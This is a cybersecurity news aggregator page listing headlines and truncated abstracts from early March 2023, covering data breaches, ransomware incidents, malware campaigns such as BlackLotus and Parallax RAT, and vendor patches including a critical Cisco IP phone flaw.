An analysis conducted by researcher Anurag Sen at CloudDefense.AI showed that the exposed Falkensteiner customer data was associated with Gustaffo, a company offering IT solutions for the hospitality industry.Cyware
March 2, 2023 – Breach
BidenCash Market Leaks Two Million Credit Cards in Birthday Blitz Full Text
Abstract
The one-year-old leaked dataset contains card information from all over the world, with a significant number of them issued in the United States, China, Mexico, India, Canada, and the UK.Cyware
March 02, 2023 – Hacker
Hackers Exploit Containerized Environments to Steals Proprietary Data and Software Full Text
Abstract
A sophisticated attack campaign dubbed SCARLETEEL is targeting containerized environments to perpetrate theft of proprietary data and software. "The attacker exploited a containerized workload and then leveraged it to perform privilege escalation into an AWS account in order to steal proprietary software and credentials," Sysdig said in a new report. The advanced cloud attack also entailed the deployment of crypto miner software, which the cybersecurity company said is either an attempt to generate illicit profits or a ploy to distract defenders and throw them off the trail. The initial infection vector banked on exploiting a vulnerable public-facing service in a self-managed Kubernetes cluster hosted on Amazon Web Services (AWS). Upon gaining a successful foothold, an XMRig crypto miner was launched and a bash script was used to obtain credentials that could be used to further burrow into the AWS cloud infrastructure and exfiltrate sensitive data. "Either cryThe Hacker News
March 2, 2023 – Government
White House Releases National Cybersecurity Strategy Full Text
Abstract
The strategy is designed to address cyber threats while also working to increase pathways for digital innovation.Lawfare
March 2, 2023 – Breach
GunAuction site was hacked and data of 565k accounts were exposed Full Text
Abstract
Hackers compromised the website GunAuction.com, a website that allows people to buy and sell guns, and stole users' data. Hackers have compromised GunAuction.com, a website that allows people to buy and sell guns, TechCrunch reported. The attackers...Security Affairs
March 2, 2023 – Breach
Canadian book giant says employee data was stolen during ransomware attack Full Text
Abstract
In an undated followup FAQ, Indigo now says employee data was involved in the attack. The Toronto-based company did not respond to requests for comment about how many people were affected.Cyware
March 02, 2023 – Cryptocurrency
New Cryptojacking Campaign Leverages Misconfigured Redis Database Servers Full Text
Abstract
Misconfigured Redis database servers are the target of a novel cryptojacking campaign that leverages a legitimate and open source command-line file transfer service to implement its attack. "Underpinning this campaign was the use of transfer[.]sh," Cado Security said in a report shared with The Hacker News. "It's possible that it's an attempt at evading detections based on other common code hosting domains (such as pastebin[.]com)." The cloud cybersecurity firm said the command line interactivity associated with transfer[.]sh has made it an ideal tool for hosting and delivering malicious payloads. The attack chain commences with targeting insecure Redis deployments, followed by registering a cron job that leads to arbitrary code execution when parsed by the scheduler. The job is designed to retrieve a payload hosted at transfer[.]sh. It's worth noting that similar attack mechanisms have been employed by other threat actors like TeamTNT andThe Hacker News
March 2, 2023 – Attack
Cryptojacking campaign targets insecure deployments of Redis servers Full Text
Abstract
Researchers from Cado Security discovered a cryptojacking campaign targeting misconfigured Redis database servers. Cado Labs researchers recently discovered a new cryptojacking campaign targeting insecure deployments of Redis database servers. Threat...Security Affairs
March 2, 2023 – Attack
Pierce Transit and City of Lakewood Investigating Potential Ransomware Attacks Full Text
Abstract
A Pierce Transit spokesperson told KOMO News in a statement that on Feb. 14, the agency "experienced a ransomware incident that temporarily disrupted some agency systems.Cyware
March 02, 2023 – Vulnerabilities
2023 Browser Security Report Uncovers Major Browsing Risks and Blind Spots Full Text
Abstract
As a primary working interface, the browser plays a significant role in today's corporate environment. The browser is constantly used by employees to access websites, SaaS applications and internal applications, from both managed and unmanaged devices. A new report published by LayerX, a browser security vendor, finds that attackers are exploiting this reality and are targeting it in increasing numbers ( download report here ). The key report findings Over half of all the browsers in the enterprise environment are misconfigured. While a configured browser is nearly impossible to compromise, stealing data from misconfigured browsers is like taking candy from a baby. The Leading misconfigurations are improper use of personal browser profiles on work devices (29%), poor patching routine (50%), and the use of corporate browser profiles on unmanaged devices. 3 of every 10 SaaS applications are non-corporate shadow SaaS, and no SaaS discovery/security solution can address its risThe Hacker News
March 2, 2023 – Vulnerabilities
Cisco fixed a critical command injection bug in IP Phone Series Full Text
Abstract
Cisco addressed a critical vulnerability, tracked as CVE-2023-20078, impacting its IP Phone 6800, 7800, 7900, and 8800 Series products. Cisco released security updates to address a critical flaw impacting its IP Phone 6800, 7800, 7900, and 8800...Security Affairs
March 2, 2023 – Hacker
Blackfly: Espionage Group Targets Materials Technology Full Text
Abstract
The Blackfly espionage group (aka APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, likely attempting to steal intellectual propertyCyware
March 02, 2023 – Malware
Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI Full Text
Abstract
A malicious Python package uploaded to the Python Package Index (PyPI) has been found to contain a fully-featured information stealer and remote access trojan. The package, named colourfool , was identified by Kroll's Cyber Threat Intelligence team, with the company calling the malware Colour-Blind . "The 'Colour-Blind' malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others," Kroll researchers Dave Truman and George Glass said in a report shared with The Hacker News. colourfool, like other rogue Python modules discovered in recent months, conceals its malicious code in the setup script, which points to a ZIP archive payload hosted on Discord. The file contains a Python script (code.py) that comes with different modules designed to log keystrokes, steal cookies, and even disable security software. The malware, besides performing defense evThe Hacker News
March 2, 2023 – Attack
Threat actors target law firms with GootLoader and SocGholish malware Full Text
Abstract
Cyber criminals are targeting law firms with GootLoader and FakeUpdates (aka SocGholish) malware families. Researchers from eSentire have foiled 10 cyberattacks targeting six different law firms throughout January and February of 2023. The firms...Security Affairs
March 2, 2023 – Phishing
Cambodia-Based “Sour Grapes” Pig Butchering Scam Targets Southeast Asia Full Text
Abstract
The teams running these scams include a young man or woman acting as the face of the scam, keyboarders who keep the victim engaged, and a team generating and repurposing media content with fabricated proof of their backstory.Cyware
March 02, 2023 – Malware
SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics Full Text
Abstract
The threat actor known as Lucky Mouse has developed a Linux version of a malware toolkit called SysUpdate, expanding on its ability to target devices running the operating system. The oldest version of the updated artifact dates back to July 2022, with the malware incorporating new features designed to evade security software and resist reverse engineering. Cybersecurity company Trend Micro said it observed the equivalent Windows variant in June 2022, nearly one month after the command-and-control (C2) infrastructure was set up. Lucky Mouse is also tracked under the monikers APT27, Bronze Union, Emissary Panda, and Iron Tiger, and is known to utilize a variety of malware such as SysUpdate , HyperBro, PlugX, and a Linux backdoor dubbed rshell. Over the past two years, campaigns orchestrated by the threat group have embraced supply chain compromises of legitimate apps like Able Desktop and MiMi Chat to obtain remote access to compromised systems. In October 2022, IntrinThe Hacker News
March 2, 2023 – Malware
R3NIN Sniffer Malware Stealing Credit Card Data From E-Commerce Consumers Full Text
Abstract
In the event of a website being hacked, attackers may implant an encoded malicious script into the web server, designed to activate when a target user accesses the corrupted web page.Cyware
March 02, 2023 – Vulnerabilities
Critical Flaw in Cisco IP Phone Series Exposes Users to Command Injection Attack Full Text
Abstract
Cisco on Wednesday rolled out security updates to address a critical flaw impacting its IP Phone 6800, 7800, 7900, and 8800 Series products. The vulnerability, tracked as CVE-2023-20078, is rated 9.8 out of 10 on the CVSS scoring system and is described as a command injection bug in the web-based management interface arising due to insufficient validation of user-supplied input. Successful exploitation of the bug could allow an unauthenticated, remote attacker to inject arbitrary commands that are executed with the highest privileges on the underlying operating system. "An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface," Cisco said in an alert published on March 1, 2023. Also patched by the company is a high-severity denial-of-service (DoS) vulnerability affecting the same set of devices, as well as the Cisco Unified IP Conference Phone 8831 and Unified IP Phone 7900 Series. CVE-2023-20079 (CVSS score: 7The Hacker News
March 2, 2023 – Business
Cisco to Acquire Valtix for Cloud Network Security Tech Full Text
Abstract
Cisco is dipping into the acquisition pool to beef up its cybersecurity portfolio with plans to acquire Valtix, an early-stage Silicon Valley startup in the cloud network security business.Cyware
March 1, 2023 – General
Covert cyberattacks on the rise as attackers shift tactics for maximum impact Full Text
Abstract
2022 was the second-highest year on record for global ransomware attempts, as well as an 87% increase in IoT malware and a record number of cryptojacking attacks (139.3 million), according to SonicWall.Cyware
March 01, 2023 – Criminals
Cybercriminals Targeting Law Firms with GootLoader and FakeUpdates Malware Full Text
Abstract
Six different law firms were targeted in January and February 2023 as part of two disparate threat campaigns distributing GootLoader and FakeUpdates (aka SocGholish) malware strains. GootLoader , active since late 2020, is a first-stage downloader that's capable of delivering a wide range of secondary payloads such as Cobalt Strike and ransomware. It notably employs search engine optimization (SEO) poisoning to funnel victims searching for business-related documents toward drive-by download sites that drop the JavaScript malware. In the campaign detailed by cybersecurity company eSentire, the threat actors are said to have compromised legitimate, but vulnerable, WordPress websites and added new blog posts without the owners' knowledge. "When the computer user navigates to one of these malicious web pages and hits the link to download the purported business agreement, they are unknowingly downloading GootLoader," eSentire researcher Keegan Keplinger saidThe Hacker News
March 1, 2023 – Government
Canada is going to ban TikTok on government mobile devices Full Text
Abstract
The Canadian government announced it will ban the video app TikTok from all government-issued devices over security concerns. Canada is going to ban the popular Chinese video-sharing app TikTok from the mobile devices of its employees over security...Security Affairs
March 1, 2023 – Vulnerabilities
Critical Vulnerabilities Patched in ThingWorx, Kepware IIoT Products Full Text
Abstract
Several industrial IoT (IIoT) software products made by PTC are affected by two critical vulnerabilities that can be exploited for denial-of-service (DoS) attacks and remote code execution.Cyware
March 01, 2023 – Malware
BlackLotus Becomes First UEFI Bootkit Malware to Bypass Secure Boot on Windows 11 Full Text
Abstract
A stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has become the first publicly known malware capable of bypassing Secure Boot defenses, making it a potent threat in the cyber landscape. "This bootkit can run even on fully up-to-date Windows 11 systems with UEFI Secure Boot enabled," Slovak cybersecurity company ESET said in a report shared with The Hacker News. UEFI bootkits are deployed in the system firmware and allow full control over the operating system (OS) boot process, thereby making it possible to disable OS-level security mechanisms and deploy arbitrary payloads during startup with high privileges. Offered for sale at $5,000 (and $200 per new subsequent version), the powerful and persistent toolkit is programmed in Assembly and C and is 80 kilobytes in size. It also features geofencing capabilities to avoid infecting computers in Armenia, Belarus, Kazakhstan, Moldova, Romania, Russia, and Ukraine. Details about BlackLotus fThe Hacker News
March 1, 2023 – Malware
BlackLotus is the first bootkit bypassing UEFI Secure Boot on Windows 11 Full Text
Abstract
ESET discovered a stealthy Unified Extensible Firmware Interface (UEFI) bootkit dubbed BlackLotus that is able to bypass the Secure Boot on Windows 11. Researchers from ESET discovered a new stealthy Unified Extensible Firmware Interface (UEFI) bootkit,...Security Affairs
March 1, 2023 – Business
Immuta Receives Strategic Investment from ServiceNow Full Text
Abstract
Immuta, a Boston, MA-based data security company, received an additional strategic investment from ServiceNow. The investment, which was in addition to the Series E funding round, will allow the company to continue growing its cloud offering.Cyware
March 01, 2023 – General
CISOs Are Stressed Out and It’s Putting Companies at Risk Full Text
Abstract
Employee well-being has become a primary focus for many businesses. Even before the pandemic, the C-suite was acutely aware of how employee mental health impacts business outcomes. But for cybersecurity professionals, stress has always been a part of the job. A new survey revealed that one of the most concerning aspects of employee mental health is how it impacts cybersecurity programs and, more broadly, a business' ability to protect itself from cyberattacks. CISOs and their teams appear to be taking the brunt of unmitigated work-related stress levels and it's affecting the entire organization. CISOs at small to midsize businesses with teams of five employees or fewer were surveyed to better understand how work-related stress is impacting CISOs – from their ability to do their job and lead their team to how it's affecting their own professional outlook and personal life. Here's what the survey results revealed. The Impact of CISO Work-Stress Levels on SmallThe Hacker News
March 1, 2023 – Outage
Satellite TV giant Dish admitted that the recent outage was caused by a ransomware attack Full Text
Abstract
Satellite TV giant Dish Network has confirmed that the recent outage was caused by a ransomware attack, it also disclosed a data breach. Satellite TV giant Dish Network finally admitted that the recent outage was caused by a ransomware attack. The...Security Affairs
March 1, 2023 – Malware
Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting Full Text
Abstract
In 2022, Trend Micro researchers noticed that they updated SysUpdate, one of their custom malware families, to include new features and add malware infection support for the Linux platform.Cyware
March 01, 2023 – Solution
Gmail and Google Calendar Now Support Client-Side Encryption (CSE) to Boost Data Privacy Full Text
Abstract
Google has announced the general availability of client-side encryption (CSE) for Gmail and Calendar, months after piloting the feature in late 2022. The data privacy controls enable "even more organizations to become arbiters of their own data and the sole party deciding who has access to it," Google's Ganesh Chilakapati and Andy Wen said . To that end, users can send and receive emails or create meeting events within their organizations or to other external parties in a manner that's encrypted "before it reaches Google servers." The company is also making available a decrypter tool in beta for Windows to decrypt client-side encrypted files and emails exported via its Data Export tool or Google Vault. macOS and Linux versions of the decrypter are expected to be released in the future. The development follows the rollout of CSE to other products such as Google Drive, Docs, Slides, Sheets, and Meet. The solution, the tech behemoth said, is aimedThe Hacker News
March 1, 2023 – Cryptocurrency
Parallax RAT used in attacks aimed at cryptocurrency entities Full Text
Abstract
Experts warn of a new wave of attacks against cryptocurrency entities, threat actors are using a RAT dubbed Parallax RAT for Infiltration. Researchers from cybersecurity firm Uptycs warns of attacks targeting cryptocurrency organizations with the Parallax...Security Affairs
March 1, 2023 – General
Can You See It Now? An Emerging LockBit Campaign Full Text
Abstract
Researchers from FortiGuard Labs observed a new LockBit ransomware campaign during December 2022 and January 2023 using a combination of techniques effective against AV and EDR solutions.Cyware
March 01, 2023 – Malware
Parallax RAT Targeting Cryptocurrency Firms with Sophisticated Injection Techniques Full Text
Abstract
Cryptocurrency companies are being targeted as part of a new campaign that delivers a remote access trojan called Parallax RAT. The malware "uses injection techniques to hide within legitimate processes, making it difficult to detect," Uptycs said in a new report. "Once it has been successfully injected, attackers can interact with their victim via Windows Notepad that likely serves as a communication channel." Parallax RAT grants attackers remote access to victim machines. It comes with features to upload and download files as well as record keystrokes and screen captures. It has been put to use since early 2020 and was previously delivered via COVID-19-themed lures. In February 2022, Proofpoint detailed an activity cluster dubbed TA2541 targeting aviation, aerospace, transportation, manufacturing, and defense industries using different RATs, including Parallax. The first payload is a Visual C++ malware that employs the process hollowing technique toThe Hacker News
March 1, 2023 – Solution
Google Gmail client-side encryption is available globally Full Text
Abstract
Gmail client-side encryption (CSE) is now available for Workspace Enterprise Plus, Education Plus, and Education Standard customers. Google announced that Gmail client-side encryption (CSE) is now available for all Google Workspace Enterprise Plus,...Security Affairs
March 1, 2023 – Breach
Video Marketing Software Animker Leaking Trove of User Data Full Text
Abstract
A misconfigured database has exposed test and personal data belonging to over 700,000 users of the websites getshow.io (an all-in-one video marketing platform) and animaker.com (a DIY video animation software).Cyware
March 1, 2023 – Ransomware
Universal Decryptor for MortalKombat Ransomware Released Full Text
Abstract
A new decryptor for the MortalKombat ransomware is now available for download. Bitdefender has been monitoring the MortalKombat ransomware family since it first appeared online in January this year.Cyware
March 1, 2023 – General
Scams are Rising and Rising Fast - Shows FTC 2022 Data Full Text
Abstract
According to new data from the FTC, U.S. consumers lost $8.8 billion to online fraud in 2022, with investment scams and imposter scams topping the list, causing $3.8 billion and $2.6 billion in losses, respectively. Among the top five fraud schemes, imposter scams topped the list, followed by onlin ... Read MoreCyware